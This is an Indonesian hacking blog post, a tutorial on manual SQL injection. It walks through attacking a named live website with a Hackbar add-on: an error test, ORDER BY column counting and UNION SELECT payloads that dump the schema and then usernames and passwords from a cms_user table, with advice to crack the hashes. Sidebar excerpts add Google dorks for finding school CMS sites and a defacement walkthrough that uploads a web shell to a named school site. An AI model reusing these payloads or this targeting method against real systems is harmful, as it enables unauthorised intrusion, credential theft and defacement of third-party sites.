Langsung ke konten utama

SQL Injection Manual Mudah

Hallo sorry ya kalau postingnya agak malem, soalnya banyak kesibukan :) maklum lah masih pelajar bukan sok sibuk lho ya :3 

Pertama saya berterimakasih kepada bang cendrawasih dan bang pegasus karena telah memberikan ilmunya :)

Langsung saja kali ini saya akan memberikan materi SQL Injection Manual Mudah.

Pertama download dulu add ons Hackbar mozilla firefox nya di sini 

Hackbar yang ini sudah dimodifikasi agar penggunannya lebih mudah dan simpel 

setelah hackbar didownload langsung saja dorking dengan dork anda.
Jika tidak tau cara membuat dork bisa ke sini
disitu dijelaskan cara membuat dan mengembangkan dork

setelah dorking dan dapat site yang vuln sqli ikuti step demi step berikut
buka web nya disini saya memakai live target http://www.pdpersi.co.id/content/pd_events.php?catid=14


Langsung saja tambahkan ( ' ) dibelakang url tanpa tanda kurung, jadinya http://www.pdpersi.co.id/content/pd_events.php?catid=14'


Klo vuln akan seperti ini ada tulisan You have an error in your SQL syntax blablabla ...
lanjut ke step berikutnya, buka hackbar nya deengan cara menekan tombol F9

Kemudian kita tambahkan exploitnya yaitu ( +order+by+1--+ ) dibelakang url tanpa tanda kurung di hackbarnya kemudian klik execute
jadinya http://www.pdpersi.co.id/content/pd_events.php?catid=14+order+by+1--+ 

Nah disini belum keliatan errornya 

kita langsung aja cari menu union based >> column count >> order by 

Lalu langsung saja kita ubah angka +1 dengan yang kita iniginkan, coba2 terus sampai muncul error seperti ini

nah kan muncul tuh error nya di angka 6, berarti databases nya dia cuman sampai 5 aja, langsung aja kita buka seperti ini di hackbar nya

Kemudian klik dan ketikkan 5 dan tekan ENTER 
Maka akan jadi seperti ini, muncul angka keramat yaitu 2 dan 5 :v 

Kita coba exploit angka 2 nya , pertama kita hapus angka 2 lalu kita exploit, lihat ss

pilih union based >> dios mysql >> dios By Madblood kemudian execute
maka jadinya akan seperti ini cari tulisan username

Disitu terlihat bahwa username dan password ada di tabel cms_user
dan link nya adalah http://www.pdpersi.co.id/content/pd_events.php
?catid=14+UNION+ALL+SELECT+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5--+

Langsung saja ubah di hackbar menjadi seperti ini 
information_schema.columns ubah menjadi cms_user
table_name ubah jadi username
column_name ubah jadi password 

maka akan seperti ini jadinya http://www.pdpersi.co.id/content/pd_events.php
?catid=14+UNION+ALL+SELECT+1,(Select+export_set(5,@:=0,(select+count(*)from(cms_user)where@:=export_set(5,export_set(5,@,username,0x3c6c693e,2),password,0xa3a,2)),@,2)),3,4,5--+
lalu execute dan jadinya akan seperti ini :)

Taraa username dan password nya udah ketemu :)
password nya tinggal hash , untuk hash password bisa di sini

gimana ? gampang kan ? gaada yang susah klo ada niat buat belajar :)
sekian tolong share ya biar teman2 kalian bisa juga :)








Label:

Komentar

Posting Komentar

Postingan populer dari blog ini

Dork Fresh CMS Balitbang

Ini adalah dork hasil dari kerjasama saya dan temen saya, namun dork ini belum saya selesaikan semua, jadi silahkan terus kunjungi blog ini buar tau updatenya yaa  :)  Juga silahkan share dan bookmark yaa :) inurl:member/daftar.php intext:NAMAKOTA inurl:/sch.id Team balitbang intext:NAMAKOTA intext:"Kamfret Team"sch.id Team Balitbang inurl:/member/daftar.php inurl:"/html/index.php" intext:"Tim Balitbang" inurl:"/html/index.php" intitle:"Selamat Datang" inurl:"/member/" intext:"Tim Balitbang" inurl:"/html/siswa.php?" inurl:"/html/alumni.php?" inurl:"/html/guru.php?" inurl:/member/daftar.php intext:"namakota" inurl:/member/ site:sch.id "selamat datang di komunitas" inurl:/elearning/ "password" site:sch.id inurl:/member/index.php "Tim Balitbang Kemdikbud versi" inurl:/user/index.php "Tim Balitbang Kemdikbud versi" inur...
5 komentar
Baca selengkapnya

Deface Website CMS Balitbang [ With New Exploiter ]

Pertama anngap saja kalean udah dorking dan undah dapet target baliitbang Klo belum bisa dorking bisa ke  Sini Dan untuk dork balitbang bisa ke  Sini Disini kita dah nemu target yaitu http:// www.telenikapalembang.sch.id Copy link nya dan buka exploiter nya di bawah ini ( Silahkan gunakan salah satu exploiter dibawah ini, jika salah satu error, bisa gunakan yang lain ) Exploiter 1   Exploiter  2 Kalau link rusak lapor di komen Masukkan link nya sehingga jadi kek gini lihat gambar ini cara caranya , klik sesuai instruksi gambar dan yang terakhir klik lewat sini brade Klik lewat sini brade Ikuti Instruksi gambar dibawah ini  Rename shell anda dulu jadi tgs-ganteng.php5 atau tgs-ganteng.phtml lalu klik simpan dan jika berhasil maka akan seperti ini jadinya ( Keluar nama sekolahnya ) Lalu jika udah berhasil langsung aja klik salah satu link yang dikasih tuh ( nomer 4 ) , klik nya berdasarkan nama shel...
20 komentar
Baca selengkapnya

Apa ? Blogspot Tim Error Violence Kena Deface ?

Baru baru ini muncul tim baru bernama Error Violence Saya sih antara percaya dan gak percaya ini blogspot kena deface Di link  http://error-violence.blogspot.co.id  bertuliskan Touched By ./CalmCoder ( Itu teman saya ) Kemarin saya dapat kabar dari temen saya klo dia bisa deface blogspot, pas saya tanya " masa sih ? blogspot mana bisa dideface -_-" Dia jawab " Ini buktinya bisa :v ada trik nya dong :*" Saya juga belum tau ini ASLI atau HOAX Untuk link langsung aja klik  http://error-violence.blogspot.co.id Jika ada pertanyaan seputar deface, berita, atau lainnya silahkan ke  https://www.facebook.com/moderncoding.id
7 komentar
Baca selengkapnya